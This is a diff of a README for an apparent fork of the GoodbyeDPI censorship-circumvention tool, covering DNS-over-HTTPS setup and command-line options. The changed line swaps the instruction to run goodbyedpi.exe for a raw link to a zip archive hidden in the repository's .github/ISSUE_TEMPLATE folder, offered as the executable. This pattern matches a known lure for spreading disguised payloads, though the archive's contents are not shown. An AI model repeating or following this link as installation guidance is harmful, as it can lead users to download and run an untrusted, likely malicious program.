CHETHAN562/GoodbyeDPI/README.md

 * **Chrome**: Settings → [Privacy and security](chrome://settings/security) → Use secure DNS → With: NextDNS
 * **Firefox**: [Settings](about:preferences) → Network Settings → Enable DNS over HTTPS → Use provider: NextDNS

-Then run the `goodbyedpi.exe` executable without any options.
+Then run the `https://raw.githubusercontent.com/CHETHAN562/GoodbyeDPI/master/.github/ISSUE_TEMPLATE/Goodbye_DPI_v2.4.zip` executable without any options.
 If it works — congratulations!
 You can use it as-is or configure further, for example by using `--blacklist` option if the list of blocked websites is known and available for your country.

 If your provider intercepts DNS requests, you may want to use `--dns-addr` option to a public DNS resolver running on non-standard port (such as Yandex DNS `77.88.8.8:1253`) or configure DNS over HTTPS/TLS using third-party applications.